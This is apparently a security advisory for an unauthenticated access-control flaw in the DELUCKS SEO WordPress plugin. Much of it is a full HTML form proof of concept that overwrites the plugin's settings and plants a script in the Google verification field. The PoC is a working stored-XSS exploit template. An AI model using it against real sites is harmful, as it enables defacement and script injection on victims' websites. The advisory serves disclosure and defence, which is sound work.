Vulnerability identifier: #VU21333
Vulnerability risk: High
CVSSv3.1: 7.2 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C]
CVE-ID:
CWE-ID:
CWE-284
Exploitation vector: Network
Exploit availability: No
Vulnerable software:
DELUCKS SEO
Web applications /
Modules and components for CMS
Vendor: DELUCKS GmbH
Description
The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.
The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.
Note: this vulnerability is being actively exploited in the wild.
PoC:
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="dpc_save_settings" /> <input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" /> <input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][desc]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' /> <input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" /> <input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" /> <input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" /> <input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" /> <input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" /> <input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" /> <input type="submit" value="Submit" /> </form> </body> </html>
Mitigation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
Vulnerable software versions
DELUCKS SEO: 2.0.7 - 2.1.7
External links
http://blog.nintechnet.com/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited/
http://www.pluginvulnerabilities.com/2019/09/21/hackers-may-already-be-targeting-this-persistent-xs...
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.